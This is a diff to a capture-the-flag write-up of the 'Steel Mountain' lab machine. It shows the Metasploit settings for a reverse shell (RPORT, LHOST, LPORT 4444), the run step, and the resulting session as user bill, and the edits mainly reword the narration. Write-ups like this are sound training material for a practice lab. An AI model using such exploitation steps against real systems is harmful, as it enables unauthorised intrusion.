Sgt-Hartmann/Write-ups/Steel Mountain/README.md

 set RPORT 8080
 set LHOST <local IP>
 ```
-We can leave the LPORT to 4444
+We can leave the LPORT to 4444 and hit `run`.
-And finally hit `run` or `exploit`.
 ![](https://github.com/user-attachments/assets/8883396f-88a0-40e4-80b4-1a02c548e4b7)
-And...We're in!
+A session was obtained successfully with user bill.
 ```
 getuid:
 STEELMOUNTAIN\bill